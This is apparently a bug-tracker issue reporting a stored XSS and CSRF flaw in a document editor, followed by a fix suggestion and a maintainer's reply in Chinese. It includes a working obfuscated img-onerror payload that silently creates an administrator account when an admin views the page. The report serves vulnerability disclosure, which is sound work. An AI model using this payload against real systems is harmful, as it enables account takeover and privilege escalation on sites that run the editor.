Vulnerability: Stored XSS and CSRF

[0x2E]

Hello, I found two vulnerabilities: a stored XSS and a CSRF. Attacker can exploit the vulnerability to execute malicious javascript on a document page and hijack the identity of other users (normal users or administrators).

XSS

The document editor does not filter or block the execution of Javascript, resulting in stored XSS. Any user browsing the document containing XSS malicious code will trigger the vulnerability.

CSRF

Using the XSS vulnerability from the previous step, attacker can hijack the identity of other users. I recorded a GIF to demonstrate a normal user hijacking the super administrator's identity to create a new administrator account.

Payload

<img src=# onerror='eval(decodeURI("var%20a%20=%20window.XMLHttpRequest%20?%20new%20XMLHttpRequest()%20:%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);a.open(%22POST%22,%22/system/user/save%22,false);a.setRequestHeader(%22Content-type%22,%22application/x-www-form-urlencoded%22);a.send(%22username=hack&given_name=hack&password=hack&email=1%25401.cn&mobile=18888888888&role_id=1&phone=&department=&position=&location=&im=%22);"))'>

[GrandMarch]

/views/page/edit.html 中editor.md的参数项 htmlDecode : "style,script,iframe|on*",
修改为
htmlDecode : false,
其他的view中似乎也存在htmlDecode参数项设置为允许的情况，没有仔细看，似乎都可以禁掉，理论上确实也不需要。

[phachon]

@GrandMarch 是的，修改为 htmlDecode : false, 不能解析 html 标签，是可以屏蔽掉。但是考虑到扩展性，可以直接写 html 标签可以更灵活一点。所以这里现在我还没有决定要不要取消它